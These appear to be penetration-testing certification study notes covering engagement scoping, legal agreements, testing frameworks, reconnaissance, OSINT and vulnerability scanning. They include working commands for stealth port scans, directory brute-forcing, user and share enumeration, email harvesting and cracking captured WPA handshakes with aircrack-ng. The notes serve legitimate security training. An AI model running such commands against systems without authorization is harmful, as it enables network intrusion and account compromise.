Define what systems, networks, or data are off-limits.
Example: Exclude the production environment to avoid disruptions.
Test Cases
Specify the scenarios and conditions under which the testing will occur.
Example: Testing for SQL injection vulnerabilities in the login module.
Escalation Process
Establish a protocol for addressing critical issues discovered during testing.
Example: Immediate notification to the security team if a critical vulnerability is found.
Testing Window
Determine the timeframe for when testing will occur.
Example: Conduct tests during off-peak hours to minimize business impact.
Key Points:
The timeline for the engagement and when testing can be conducted.
What locations, systems, applications, or other potential targets are in scope.
Types of tests that are allowed or disallowed.
Data handling requirements for information gathered during the penetration test.
What behaviors to expect from the target.
What resources are committed to the test.
Legal concerns.
When and how communications will occur.
Who to contact in case of particular events.
Who is permitted to engage the pentest team.
Agreement Types
Non-Disclosure Agreement (NDA) → Legal documents that help enforce confiden- tial relationships between two parties.
NDAs protect one or more parties in the relationship and typically outline the parties, what information should be considered confidential, how long the agreement lasts, when and how disclosure is acceptable, and how confidential information should be handled.
Master Service Agreement (MSA) → Defines the terms that the organizations will use for future work.
This makes ongoing engagements and SOWs much easier to work through, as the overall MSA is referred to in the SOW, prevent- ing the need to renegotiate terms.
MSAs are common when organizations anticipate working together over a period of time or when a support contract is created.
Statement of Work (SoW) → A document that defines the purpose of the work, what work will be done, what deliverables will be created, the timeline for the work to be completed, the price for the work, and any additional terms and conditions that cover the work.
Alternatives to statements of work include statements of objectives (SOOs) and performance work statements (PWSs), both of which are used by the U.S. government.
Terms of Service (ToS) → Defines the rules that users must agree to abide by to use a service.
Ex. Conditions under which the penetration testing services will be rendered, including acceptable use policies.
Target Selection
Classless Inter-Domain Routing (CIDR) Ranges → Defines a range of IP addresses for network targeting.
Example: The CIDR range 192.168.1.0/24 includes all IP addresses from 192.168.1.0 to 192.168.1.255.
Domains
Specifies domain names to be tested.
Example: Testing example.com and its subdomains (sub.example.com).
Internet Protocol (IP) Addresses
Individual IP addresses selected for penetration testing.
Example: Testing specific servers at 192.168.1.10 and 192.168.1.20.
Uniform Resource Locator (URL)
Specific web addresses within domains targeted for testing.
Example: Testing the URL http://example.com/login for vulnerabilities.
Assessment Types
Web
Focuses on identifying vulnerabilities in web applications and websites.
Example: Testing for cross-site scripting (XSS) and SQL injection.
Comparison: Web assessments often involve different tools and techniques than network assessments due to the nature of web technologies.
Network
Examines network infrastructure, including routers, switches, and firewalls, for security weaknesses.
Example: Scanning for open ports, weak configurations, and vulnerabilities in network devices.
Comparison: Network assessments are more focused on connectivity and data flow between systems, unlike web or mobile assessments.
Mobile
Targets vulnerabilities in mobile applications and devices.
Example: Testing for insecure data storage, insufficient encryption, and insecure communication in a mobile app.
Comparison: Mobile assessments require different skill sets and tools compared to web and network assessments due to the unique operating systems and application environments.
Cloud
Assesses security of cloud-based infrastructure, platforms, and services.
Example: Evaluating the security of AWS, Azure, or Google Cloud configurations.
Comparison: Cloud assessments involve understanding cloud-specific security practices and compliance requirements, different from on-premises assessments.
Application Programming Interface (API)
Examines the security of APIs, which facilitate communication between different software components.
Example: Testing for insecure authentication, authorization, and input validation in APIs.
Comparison: API assessments are specialized and focus on data exchange mechanisms, unlike general application assessments.
Application
Broad category encompassing the assessment of software applications, including desktop and enterprise applications.
Example: Testing for buffer overflows, improper error handling, and insecure code practices.
Comparison: Application assessments are broader and can include aspects of web, mobile, and API assessments.
Wireless
Focuses on the security of wireless networks, including Wi-Fi and Bluetooth.
Example: Testing for weak encryption protocols (e.g., WEP), unauthorized access points, and insecure wireless configurations.
Comparison: Wireless assessments require specific tools and techniques, such as Wi-Fi sniffers and signal analyzers, differing from wired network assessments.
Shared Responsibility Model
Hosting Provider Responsibilities
Infrastructure Security: Ensuring the physical and foundational security of servers, storage, and networking components.
Example: Data center security, hardware maintenance, and network security (e.g., DDoS protection).
Compliance: Adhering to regulatory and industry standards.
Example: Compliance with SOC 2, ISO 27001, or PCI-DSS for data protection and privacy.
Customer Responsibilities
Data Security: Protecting data within the cloud environment, including encryption and access controls.
Example: Encrypting sensitive data stored in cloud databases.
Configuration Management: Properly configuring cloud services and resources.
Example: Setting up secure configurations for virtual machines and storage buckets to prevent unauthorized access.
User Access Management: Managing user identities and access to resources.
Example: Implementing multi-factor authentication (MFA) and least privilege access controls.
Penetration Tester Responsibilities
Testing Authorization: Obtaining necessary permissions to conduct penetration testing.
Example: Securing formal approval from both the customer and hosting provider before initiating tests.
Scope Adherence: Testing within the agreed-upon scope and respecting rules of engagement.
Example: Only testing authorized systems and avoiding any non-approved systems or data.
Vulnerability Reporting: Providing detailed reports on discovered vulnerabilities and recommendations for remediation.
Example: Creating comprehensive reports with clear, actionable recommendations for improving security.
Third-Party Responsibilities
Service Integration Security: Ensuring the security of third-party services integrated into the customer’s environment.
Example: Securely integrating third-party payment processors or authentication services.
Compliance and Audits: Adhering to relevant compliance requirements and undergoing regular security audits.
Example: Ensuring third-party vendors comply with GDPR or HIPAA regulations as required.
Incident Response: Collaborating in incident response activities when security breaches involve third-party services.
Example: Coordinating with third-party providers to quickly address and mitigate breaches.
Legal and Ethical Considerations
Authorization Letters
Purpose: Formal documents granting permission to conduct penetration testing.
Example: A written authorization from a company’s senior management allowing a pentester to test specific systems.
Importance: Protects both the client and the tester legally, ensuring all parties are aware of the testing activities.
Content: Should include scope, timeframe, and any limitations of the test.
Example: An authorization letter specifying the systems to be tested, the methods to be used, and the duration of the testing period.
Mandatory Reporting Requirements
Legal Obligation: Certain vulnerabilities or breaches must be reported to relevant authorities or stakeholders.
Example: Reporting discovered vulnerabilities to the organization’s security team and, if applicable, to regulatory bodies.
Compliance: Adhering to industry standards and regulations that mandate reporting.
Example: GDPR requires notifying authorities within 72 hours of discovering a data breach.
Ethical Responsibility: Ensuring transparency and accountability by reporting findings that could impact stakeholders.
Example: Reporting a critical vulnerability in a financial system that could lead to significant data loss or theft.
Risk to the Penetration Tester
Legal Risks: Potential legal consequences if testing is done without proper authorization.
Example: Facing charges of unauthorized access or data tampering if tests are conducted without explicit permission.
Physical Risks: Possible dangers when testing physical security controls or on-site systems.
Example: Risk of injury when physically accessing and testing security of data centers or other secure facilities.
Professional Risks: Reputation and career implications if testing is conducted unethically or results are mishandled.
Example: Loss of credibility or job if a tester fails to disclose a significant vulnerability or mishandles sensitive information.
Objective 1.2
Peer Review
Purpose: Ensures accuracy and thoroughness of the penetration testing results through review by fellow security professionals.
Example: A pentester’s report is reviewed by another team member for completeness and accuracy.
Stakeholder Alignment
Purpose: Ensures all relevant parties are informed and in agreement with the objectives and scope of the penetration test.
Example: Regular meetings with IT, security teams, and management to align on testing goals and expectations.
Importance: Facilitates a unified approach and understanding among stakeholders.
Outcome: Cohesive and coordinated efforts towards improving security.
Root Cause Analysis
Purpose: Identifies the underlying reasons for discovered vulnerabilities or security issues.
Example: Analyzing why a SQL injection vulnerability existed in an application’s code.
Importance: Helps prevent recurrence by addressing the fundamental issues rather than just symptoms.
Outcome: Implementation of long-term fixes and improvements in security practices.
Escalation Path
Purpose: Defines a clear process for escalating critical issues discovered during testing.
Example: Immediate notification to senior management if a critical vulnerability is found.
Importance: Ensures swift action and decision-making to address serious risks.
Outcome: Timely and effective mitigation of critical vulnerabilities.
Secure Distribution
Purpose: Ensures sensitive findings and reports are shared securely with authorized personnel only.
Example: Using encrypted emails or secure portals to share test results.
Importance: Protects sensitive information from unauthorized access and potential misuse.
Outcome: Maintains confidentiality and integrity of the findings.
Articulation of Risk, Severity, and Impact
Purpose: Clearly communicates the risks, severity, and potential impact of identified vulnerabilities.
Example: Explaining the potential business impact of a critical vulnerability in layman’s terms to non-technical stakeholders.
Importance: Helps stakeholders understand the urgency and significance of the findings.
Outcome: Informed decision-making regarding remediation priorities and resource allocation.
Goal Reprioritization
Purpose: Adjusts testing and remediation goals based on new findings and evolving business needs.
Example: Shifting focus to newly discovered critical vulnerabilities that pose immediate risks.
Importance: Ensures resources are effectively utilized to address the most pressing security issues.
Outcome: Dynamic and responsive approach to penetration testing and remediation.
Business Impact Analysis
Purpose: Assesses the potential impact of vulnerabilities on business operations.
Example: Evaluating how a vulnerability could affect customer data and business continuity.
Importance: Provides context for understanding the real-world implications of security issues.
Outcome: Prioritized remediation efforts based on business risk.
Client Acceptance
Purpose: Obtains formal approval from the client for the findings, recommendations, and remediation plan.
Example: Presenting the final report to the client and gaining their agreement on the next steps.
Importance: Ensures client buy-in and commitment to implementing recommended security measures.
Outcome: Successful collaboration and alignment on security improvements.
Objective 1.3
Open Source Security Testing Methodology Manual (OSSTMM)
Purpose: Provides a comprehensive methodology for security testing and analysis.
A broad penetration testing methodology guide with information about analysis, metrics, workflows, human security, physical security, and wireless security. Unfortunately, it has not been updated since 2010, resulting in more modern techniques and technologies not being included in the manual.
Council of Registered Ethical Security Testers (CREST)
Purpose: Offers accreditation and certification for organizations and individuals in the security testing industry.
Key Features: Sets professional standards for security testing and provides guidelines and certifications.
Penetration Testing Execution Standard (PTES)
Purpose: Provides a detailed framework for performing penetration testing.
It ranges from pre-engagement interactions like scoping and questions to ask clients, to details such as how to deal with third parties.
It also includes a full range of penetration testing techniques and concepts, making it one of the most complete and modern openly available penetration testing standards.
Purpose: Lists the top 10 most critical web application security risks.
Key Features: Focuses on prevalent and severe web application vulnerabilities like SQL injection, XSS, and more.
OWASP Mobile Application Security Verification Standard (MASVS)
Purpose: Provides a framework for securing mobile applications.
Key Features: Defines security requirements and verification levels for mobile app security.
Purdue Model
Purpose: A reference model for industrial control systems (ICS) security.
Key Features: Divides ICS networks into different levels, each with specific security considerations.
The Purdue Model, also known as the Purdue Enterprise Reference Architecture (PERA), is a widely accepted framework used to segment and secure Industrial Control Systems (ICS) environments.
It organizes the ICS architecture into multiple layers, each with specific roles and security requirements.
This model helps in understanding how to effectively secure and manage different components of an ICS network.
Layers of the Purdue Model
Level 0: Physical Process
Description: The actual physical processes and machinery, including sensors, actuators, and other devices that interact directly with the physical environment.
Examples:
Sensors measuring temperature, pressure, or flow rates.
Actuators controlling valves, motors, or pumps.
Level 1: Basic Control
Description: The control devices that directly manage Level 0 equipment, often referred to as programmable logic controllers (PLCs) or remote terminal units (RTUs).
Examples:
PLCs and RTUs executing control logic to automate processes.
Human-Machine Interfaces (HMIs) at the local control level.
Level 2: Supervisory Control
Description: Systems that provide supervisory control and data acquisition (SCADA) functions, aggregating data from Level 1 and providing oversight and control.
Examples:
SCADA systems for real-time monitoring and control.
HMIs at the supervisory control level.
Level 3: Operations Management
Description: Systems used for production control, including batch management, production scheduling, and other operational functions.
Examples:
Manufacturing Execution Systems (MES) managing production workflows.
Systems for coordinating production processes and ensuring quality control.
Level 4: Enterprise Systems
Description: Enterprise-level systems that manage business logistics, planning, and enterprise resource management.
Examples:
Enterprise Resource Planning (ERP) systems.
Customer Relationship Management (CRM) systems.
Level 5: External Networks
Description: Connections to external networks, including business partners, suppliers, and the internet.
Secure Software Development Life Cycle (SDLC): Integrates security into the software development process to produce secure software.
Minimum Password Requirements: Sets baseline standards for password creation to enhance account security.
Policies and Procedures: Establishes a framework for organizational security practices and employee behavior, supported by training and awareness programs.
Operational Controls
Job Rotation: Reduces risk of fraud and errors by changing employees' roles periodically.
Time-of-Day Restrictions: Limits access to specific times to reduce unauthorized access risks.
Mandatory Vacations: Detects and prevents fraudulent activities by requiring regular vacations.
User Training: Educates employees on security policies and best practices to reduce human error and enhance overall security.
Physical Controls
Access Control Vestibule: Controls and monitors entry to secure areas, preventing unauthorized access.
Biometric Controls: Authenticates individuals using unique biological characteristics for high security.
Video Surveillance: Monitors and records activities to deter unauthorized actions and provide evidence.
Chapter 2
Objective 2.1
Active and Passive Reconnaissance
Active Reconnaissance → Actively interacts with the target system or network to gather information.
Methods: Port scanning, ping sweeps, banner grabbing, social engineering.
Risks: High detection risk, potential legal issues.
Importance: Provides detailed and actionable information about the target's systems and vulnerabilities.
Passive Reconnaissance → Gathers information about the target without directly interacting with the target system or network.
Methods: OSINT, WHOIS lookup, DNS enumeration, social media monitoring, website analysis.
Benefits: Stealthy, reduces legal risk.
Importance: Gathers initial information about the target without direct interaction, forming a foundation for further active reconnaissance.
Open-Source Intelligence (OSINT)
Social Media: Gathers personal and organizational information for social engineering and intelligence.
Examples:
LinkedIn: Identifying key employees, organizational structure, and technology stack used.
Facebook/Twitter: Gathering personal information, behaviors, and affiliations.
Importance: Provides insights into potential targets, their roles, and publicly shared information that can be leveraged in social engineering attacks.
Job Boards: Identifies technologies and potential vulnerabilities based on job postings.
Examples:
Indeed/Glassdoor: Reviewing job listings to find out what technologies and skills are sought by the target organization.
Importance: Reveals information about the organization's IT environment, security tools, and potential vulnerabilities based on required skills.
Scan Code Repositories: Searches for sensitive information and code vulnerabilities in public repositories.
Examples:
GitHub/GitLab: Searching for exposed credentials, API keys, or sensitive configuration files.
Importance: Uncovers potentially exploitable information and code vulnerabilities that can be used in an attack.
Domain Name System (DNS):
DNS Lookups: Retrieves domain configuration details.
Example: Using nslookup or dig to retrieve A, MX, and CNAME records.
Reverse DNS Lookups: Maps IP addresses to domain names.
Example: Using host command to find domains pointing to an IP address.
Importance: Helps map out the target's network structure and identify potential entry points.
Cached Pages: Accesses historical web page versions to find removed or altered information.
Examples:
Wayback Machine: Viewing archived versions of a website to find old, possibly insecure configurations or sensitive information.
Importance: Provides access to information that has been removed or altered, which can be valuable in understanding historical security practices and changes.
Cryptographic Flaws: Identifies weaknesses in encryption implementations.
Examples:
SSL/TLS Analysis: Using tools like SSL Labs to assess the security of a website’s SSL/TLS configuration.
Importance: Detects vulnerabilities in encryption that could be exploited to intercept or manipulate data.
Password Dumps: Uses leaked credentials to find potential entry points.
Examples:
Have I Been Pwned: Checking if the target's email addresses have been compromised in data breaches.
Importance: Provides potential entry points if reused or weak passwords are found in the dumps.
Network Reconnaissance
Purpose: To gather information about a target network, identifying its structure, devices, services, and potential vulnerabilities. This information is crucial for planning and executing further penetration testing activities.
Network Scanning
Purpose: Identifies active devices, open ports, and services.
Tools: Nmap, Angry IP Scanner.
Examples: Scanning a subnet to identify all active hosts.
Ping Sweeps
Purpose: Discovers active devices using ICMP echo requests.
Tools: Fping, Nmap.
Examples: Using fping to ping all devices in a subnet.
Port Scanning
Purpose: Identifies open ports and running services.
Tools: Nmap, Masscan.
Examples: Performing a SYN scan to identify open ports.
OS Fingerprinting
Purpose: Determines the operating system of a target device.
Tools: Nmap, Xprobe2.
Examples: Using Nmap’s OS detection feature.
Service Enumeration
Purpose: Gathers detailed information about services on open ports.
Tools: Nmap, Netcat.
Examples: Identifying the version of a web server running on port 80.
Network Mapping
Purpose: Creates a visual representation of the network topology.
Tools: Nmap with Zenmap, SolarWinds Network Topology Mapper.
Examples: Visualizing network scan results with Zenmap.
DNS Enumeration
Purpose: Gathers information about the target’s DNS infrastructure.
Tools: DNSRecon, Fierce.
Examples: Listing all DNS records for a target domain.
Protocol Scanning
Purpose: Protocol scanning aims to identify open ports and the services running on them by sending packets to various ports on a target system. It helps in understanding which services are exposed and potentially vulnerable.
TCP Scanning
Purpose: Identifies open TCP ports and services by analyzing TCP packet responses.
Tools: Nmap, Masscan.
Types:
SYN Scan: Stealthy, sends SYN packets.
Connect Scan: Completes the TCP handshake, more detectable.
FIN, Xmas, Null Scans: Uses specific TCP flags to elicit responses from closed ports.
Examples:nmap -sS target_ip, nmap -sT target_ip.
UDP Scanning
Purpose: Identifies open UDP ports and services by sending UDP packets and analyzing responses.
Tools: Nmap, Unicornscan.
Examples:nmap -sU target_ip.
Challenges: Less reliable due to stateless nature of UDP and ICMP rate limiting.
Certificate Transparency Logs
Purpose: Monitors and audits digital certificates issued by Certificate Authorities (CAs) to detect malicious or misissued certificates.
Tools:
crt.sh: A website for searching Certificate Transparency logs.
Google Certificate Transparency: A project providing public logs of issued certificates.
Examples:
Using crt.sh to find all certificates issued for a target domain.
Importance: Helps identify rogue or unexpected certificates, which can indicate potential man-in-the-middle (MITM) attacks or unauthorized domain usage.
Information Disclosure
Purpose: Identifies unintentional leakage of sensitive information through various channels.
Examples:
Error Messages: Examining error messages that reveal software versions, paths, or other sensitive details.
Metadata: Analyzing document properties for hidden information like author names, software versions, etc.
Source Code: Checking for comments in HTML or other code that disclose internal workings or credentials.
Importance: Detecting and mitigating information disclosure reduces the risk of attackers leveraging this information for more targeted attacks.
Search Engine Analysis/Enumeration
Purpose: Uses search engines to find sensitive information or entry points exposed on the web.
Tools:
Google Dorking: Using advanced search operators to find exposed information.
Shodan: Search engine for Internet-connected devices.
Examples:
Using Google dorks to find publicly accessible login pages or sensitive files.
Example: site:example.com inurl:login
Importance: Uncovers publicly accessible information that might be overlooked, providing attackers with valuable data.
Network Sniffing
Purpose: Captures and analyzes network traffic to gather information about the network and the devices on it.
Tools:
Wireshark: Popular network protocol analyzer.
tcpdump: Command-line packet analyzer.
Examples:
Capturing traffic to identify protocols in use, active devices, and potential vulnerabilities.
Importance: Provides insights into network communication patterns, potential vulnerabilities, and security posture.
IoT and Operational Technology (OT) Protocols
Purpose: Identifies and analyzes protocols used in IoT and OT environments.
Examples:
Modbus, DNP3: Commonly used in industrial control systems (ICS).
MQTT, CoAP: Used in IoT communication.
Importance: Understanding these protocols helps in identifying vulnerabilities specific to IoT and OT environments, which are often overlooked but critical for industrial and smart devices.
Banner Grabbing
Purpose: Collects banners from network services to identify the software and version running on them.
Tools:
Netcat: Basic network utility for reading from and writing to network connections.
Nmap: Supports banner grabbing with service detection.
Examples:
Using Netcat to connect to an open port and capture the service banner.
Command: nc target_ip port
Importance: Identifies software versions and configurations, which can be matched against known vulnerabilities for further exploitation.
HTML Scraping
Purpose: Extracts information from web pages to gather intelligence about the target.
Tools:
Beautiful Soup: Python library for web scraping.
Scrapy: Python framework for web scraping.
Examples:
Scraping a website for email addresses, internal links, or other useful information.
Importance: Automates the process of extracting valuable information from web pages, which can be used for further analysis or attacks.
Objective 2.2
Operating System (OS) Fingerprinting
Purpose: Determines the operating system of a target device.
Tools:
Nmap: Includes OS detection capabilities.
Xprobe2: Active OS fingerprinting tool.
Examples:
Using Nmap’s OS detection feature to identify the operating system running on a target server.
Command: nmap -O target_ip
Importance: Helps tailor further attacks to the specific operating systems identified, improving the chances of successful exploitation.
Service Discovery
Purpose: Identifies services running on open ports and gathers detailed information about them.
Tools:
Nmap: Service version detection.
Netcat: Versatile tool for interacting with network services.
Examples:
Using Nmap to identify the version of a web server running on port 80.
Command: nmap -sV target_ip
Importance: Provides detailed information about the services, including software versions, which can be used to identify known vulnerabilities.
Protocol Enumeration
Purpose: Identifies and gathers information about the protocols in use on the target network.
Tools:
Wireshark: Network protocol analyzer.
Nmap: Supports various protocol scans.
Examples:
Using Nmap to scan for specific protocols such as SMB, FTP, and SSH.
Command: nmap -sV -p 21,22,139 target_ip
Importance: Helps in understanding the communication protocols used, which is crucial for identifying potential vulnerabilities.
DNS Enumeration
Purpose: Gathers information about the target’s DNS infrastructure.
Tools:
DNSRecon: DNS enumeration tool.
Fierce: DNS reconnaissance tool.
Examples:
Using DNSRecon to list all DNS records for a target domain.
Command: dnsrecon -d target_domain
Importance: Identifies domain names, subdomains, and associated IP addresses, which can provide additional targets for further reconnaissance.
Directory Enumeration
Purpose: Identifies and lists directories and files on web servers.
Tools:
DirBuster: Web directory scanner.
Gobuster: Directory and file brute-forcer.
Examples:
Using Gobuster to find hidden directories and files on a web server.
Command: gobuster dir -u target_url -w wordlist.txt
Importance: Helps identify hidden resources that might contain sensitive information or provide entry points for attacks.
Host Discovery
Purpose: Identifies active hosts on a network.
Tools:
Nmap: Network scanning tool.
Ping Sweep: Using ping to identify live hosts.
Examples:
Using Nmap to discover hosts on a network.
Command: nmap -sn target_subnet
Importance: Provides a list of active devices, which can be targeted for further analysis.
Share Enumeration
Purpose: Identifies shared resources on a network, such as file shares.
Tools:
SMBclient: Command-line tool for accessing SMB/CIFS resources.
enum4linux: Linux tool for enumerating information from Windows systems.
Examples:
Using SMBclient to list shared resources on a Windows server.
Command: smbclient -L //target_ip
Importance: Identifies shared resources that might contain sensitive information or provide entry points for attacks.
Local User Enumeration
Purpose: Identifies user accounts on a target system.
Tools:
enum4linux: Tool for enumerating information from Windows systems.
rpcclient: Command-line tool for interacting with Windows RPC services.
Examples:
Using enum4linux to list user accounts on a Windows system.
Command: enum4linux -U target_ip
Importance: Helps in identifying potential user accounts that can be targeted for password attacks or privilege escalation.
Email Account Enumeration
Purpose: Identifies email accounts associated with a target domain.
Tools:
theHarvester: Tool for gathering emails, subdomains, and more.
Hunter.io: Web service for finding email addresses.
Examples:
Using theHarvester to find email addresses associated with a target domain.
Command: theHarvester -d target_domain -b google
Importance: Identifies potential targets for phishing attacks or social engineering.
Wireless Enumeration
Purpose: Identifies wireless networks and gathers information about them.
Tools:
Kismet: Wireless network detector, sniffer, and intrusion detection system.
Aircrack-ng: Suite of tools for wireless network security.
Examples:
Using Kismet to discover wireless networks and their configurations.
Importance: Helps in identifying wireless networks, their security configurations, and potential vulnerabilities.
Permission Enumeration
Purpose: Identifies permissions and access controls on resources.
Tools:
AccessChk: Windows tool for viewing permissions.
Linux file permissions commands: Using ls -l to view file permissions.
Examples:
Using AccessChk to list permissions on a Windows file or directory.
Command: accesschk.exe -s target_directory
Importance: Helps in identifying overly permissive access controls, which can be exploited for privilege escalation or unauthorized access.
Secrets Enumeration
Purpose: Identifies sensitive information such as credentials, access keys, and tokens that can be used to gain unauthorized access.
Tools:
TruffleHog: Searches through git repositories for secrets.
AWS IAM Access Analyzer: Identifies permissions and access keys in AWS environments.
Examples:
Cloud Access Keys: Using TruffleHog to search for AWS keys in a Git repository.
Examples: Boolean, string, and arithmetic operators in Bash and Python.
Use of Libraries, Functions, and Classes
Libraries: Leverage existing functionalities (e.g., requests in Python).
Functions: Encapsulate reusable code.
Classes: Define data structures and behaviors.
Objective 2.4
Wayback Machine
Purpose: Archive of web pages; allows viewing of historical versions of websites.
Usage: Check past versions of a target site for exposed sensitive information or vulnerabilities.
Example: Visiting archive.org to look at past snapshots of target_site.com.
Maltego
Purpose: Data mining tool; visualizes relationships between people, companies, domains, etc.
Maltego is a powerful data mining and link analysis tool developed by Paterva.
It is used for gathering and connecting information across various platforms, helping users visualize complex relationships among people, groups, websites, domains, networks, and other entities.
Maltego is widely utilized in cybersecurity, open-source intelligence (OSINT), forensic investigations, and threat intelligence.
Usage: Generate graphs that display the interconnections between different pieces of information.
Example: Using Maltego to map out relationships between email addresses, domains, and social media profiles.
Recon-ng
Purpose: Open-source web reconnaissance framework.
Usage: Automate the process of gathering open-source intelligence.
Example: Running modules in Recon-ng to gather email addresses from a domain.
Purpose: Search engine for Internet-connected devices.
Usage: Find devices with specific vulnerabilities or configurations.
Example: Using Shodan to find all exposed webcams.
Command: shodan search "webcamxp"
SpiderFoot
Purpose: Automated OSINT tool; collects data from various sources.
SpiderFoot is an open-source intelligence (OSINT) automation tool used for reconnaissance and information gathering.
It automates the process of collecting intelligence on IP addresses, domain names, email addresses, and other entities.
SpiderFoot scans multiple data sources to build a detailed profile of the target, making it a valuable tool for penetration testers, security researchers, and threat analysts.
Usage: Automate the collection of information about a target.
Example: Running a scan in SpiderFoot to gather data on a target domain.
Command: python3 spiderfoot.py -s target.com
WHOIS
Purpose: Look up domain registration information.
Usage: Find ownership and contact information for a domain.
Example: Using a WHOIS lookup tool to find the registrant's information for target.com
Command: whois target.com
nslookup/dig
Purpose: DNS lookup utilities.
Usage: Retrieve DNS records for a domain.
Example:
nslookup:nslookup target.com
dig:dig target.com
Censys.io
Purpose: Search engine for internet-connected devices.
Usage: Find devices, services, and vulnerabilities.
Example: Searching Censys for devices running specific software versions.
Hunter.io
Purpose: Email address search engine.
Usage: Find email addresses associated with a domain.
Example: Using Hunter.io to find contact emails for target.com.
DNSdumpster
Purpose: DNS recon and research tool.
DNSdumpster is an online tool that provides comprehensive domain reconnaissance by performing DNS enumeration and gathering information about the DNS infrastructure of a given domain.
It helps security researchers, penetration testers, and IT professionals map out the external network infrastructure associated with a domain, including subdomains, mail servers, and other DNS records.
Usage: Find DNS records and subdomains for a target.
Example: Using DNSdumpster to find subdomains for target.com.
Amass
Purpose: In-depth DNS enumeration tool.
Amass is an open-source tool developed by the OWASP (Open Web Application Security Project) foundation, designed for in-depth network mapping and external asset discovery.
It is particularly effective for DNS enumeration, subdomain discovery, and reconnaissance.
Amass uses multiple techniques to gather information about a target domain, including active and passive methods, and integrates data from various sources to provide comprehensive results.
Usage: Discover subdomains and map out network structures.
Example: Running Amass to enumerate subdomains of target.com.
Command: amass enum -d target.com
Nmap
Purpose: Network scanning tool.
Usage: Discover hosts and services on a network.
Example:
Basic Scan: nmap target_ip
Nmap Scripting Engine (NSE): Extend Nmap functionality with scripts.
Example Script: nmap --script http-enum target_ip
theHarvester
Purpose: Gather emails, subdomains, hosts, and more from public sources.
Usage: OSINT gathering tool.
Example:theHarvester -d target.com -b google
WiGLE.net
Purpose: Wireless network mapping service.
WiGLE.net (Wireless Geographic Logging Engine) is an online service that aggregates data on the locations of wireless networks worldwide.
It collects information about Wi-Fi networks (SSIDs, BSSIDs, GPS coordinates, etc.) and allows users to search, map, and analyze this data.
WiGLE is popular among security researchers, penetration testers, and wireless network enthusiasts for discovering and mapping Wi-Fi networks.
Usage: Find and map Wi-Fi networks.
Example: Searching WiGLE.net for Wi-Fi networks in a specific area.
InSSIDer
Purpose: Wi-Fi network scanner.
Usage: Identify Wi-Fi networks and their configurations.
Example: Using InSSIDer to scan for nearby Wi-Fi networks.
OSINTframework.com
Purpose: Collection of OSINT tools and resources.
Usage: Reference for various OSINT tools.
Example: Visiting OSINTframework.com to find tools for a specific type of OSINT task.
Wireshark/tcpdump
Purpose: Network protocol analyzers.
Usage: Capture and analyze network traffic.
Example:
Wireshark: Using the graphical interface to capture packets.
tcpdump:tcpdump -i eth0 -w capture.pcap
Aircrack-ng
Purpose: Suite of tools for Wi-Fi network security assessment.
Usage: Capture and crack WEP/WPA-PSK keys.
Example:
Capturing packets: airodump-ng wlan0
Cracking a WPA handshake: aircrack-ng -w wordlist.txt -b target_bssid capture_file.cap
Chapter 3
Objective 3.1
Container Scans
Purpose: Assess security of containerized applications and environments.
Techniques:
Sidecar Scans: Utilize a sidecar container to monitor and analyze the security of a main container.
Example: A sidecar container running a security tool to check for vulnerabilities in a main application container.
Application Scans
Purpose: Identify vulnerabilities in applications at different stages of development and deployment.
Techniques:
Dynamic Application Security Testing (DAST): Test running applications for vulnerabilities by simulating attacks.
Example: Using tools like OWASP ZAP to perform DAST on a web application.
Interactive Application Security Testing (IAST): Combine elements of DAST and SAST by monitoring the application from within during runtime.
Example: Using tools like Contrast Security to identify vulnerabilities as the application runs.
Software Composition Analysis (SCA): Analyze third-party and open-source components for known vulnerabilities.
Example: Using tools like Snyk or Black Duck to scan dependencies for vulnerabilities.
Static Application Security Testing (SAST): Analyze source code for vulnerabilities without executing the code.
Example: Using tools like SonarQube or Checkmarx for static code analysis.
Subtypes:
Infrastructure as Code (IaC): Analyze infrastructure configuration files (e.g., Terraform, CloudFormation) for security issues.
Source Code Analysis: Directly examine the application’s source code to find vulnerabilities.
Mobile Scan: Assess mobile applications for security vulnerabilities.
Example: Using tools like MobSF to scan Android or iOS applications.
Network Scans
Purpose: Identify vulnerabilities in network devices, services, and configurations.
Techniques:
TCP/UDP Scan: Scan for open TCP and UDP ports to identify services running on the network.
Example: Using Nmap to perform TCP/UDP scans on a target network.
Command: nmap -sS -sU target_ip
Stealth Scans: Use techniques to avoid detection by network security systems while scanning.
Example: Using Nmap's SYN scan (also known as half-open scan) to perform stealth scans.
Command: nmap -sS target_ip
Host-Based Scans
Purpose: Identify vulnerabilities on individual hosts (e.g., servers, workstations).
Techniques:
Agent-based: Install an agent on the host to gather detailed information.
Example: Using Nessus agents to perform deep scans on hosts.
Agentless: Use network protocols (e.g., SMB, SSH) to gather information without installing software.
Example: Using OpenVAS to perform remote scans on hosts.
Authenticated vs. Unauthenticated Scans
Authenticated Scans:
Purpose: Perform scans with credentials to get deeper insights into vulnerabilities.
Benefits: Access to detailed information such as configuration files, installed software, and patches.
Example: Running a credentialed Nessus scan to check for missing patches.
Unauthenticated Scans:
Purpose: Perform scans without credentials, simulating an external attacker.
Benefits: Identify vulnerabilities exposed to unauthenticated users.
Example: Using Nmap for a network scan without credentials.
Secrets Scanning
Purpose: Identify sensitive information such as API keys, passwords, and tokens in source code and configuration files.
Techniques:
Automated Tools: Use tools specifically designed to find secrets.
Example: Using GitGuardian to scan repositories for exposed secrets.
Wireless Scans
Purpose: Assess security of wireless networks.
Techniques:
SSID Scanning: Identify and list the SSIDs of nearby wireless networks.
Example: Using tools like Kismet to scan for SSIDs.
Channel Scanning: Identify which channels wireless networks are operating on.
Example: Using tools like WiFi Analyzer to scan channels.
Signal Strength Scanning: Measure the signal strength of wireless networks to determine proximity and potential interference.
Example: Using tools like NetSpot to map signal strength.
Industrial Control Systems (ICS) Vulnerability Assessment
Purpose: Identify vulnerabilities in ICS environments, which are critical for industrial operations.
Techniques:
Manual Assessment: Perform a hands-on review of ICS components and configurations.
Example: Conducting a physical and logical assessment of PLCs, SCADA systems, and network configurations.
Port Mirroring: Use port mirroring on network switches to capture and analyze ICS traffic without interrupting operations.
Example: Setting up port mirroring on a switch to capture ICS traffic for analysis using Wireshark.
Tools
Nikto
Purpose: Web server scanner.
Nikto is an open-source web server scanner that performs comprehensive tests against web servers for multiple items, including over 6,700 potentially dangerous files or programs, checks for outdated versions of over 1,250 servers, and version-specific problems on over 270 servers.
Nikto is widely used by penetration testers, security researchers, and IT professionals to identify vulnerabilities and misconfigurations in web servers.
Usage: Identify potential issues in web servers, such as outdated software, misconfigurations, and vulnerabilities.
Example: Scanning a web server for common vulnerabilities.
Command: nikto -h http://targetwebsite.com
Greenbone/OpenVAS
Purpose: Vulnerability scanning and management.
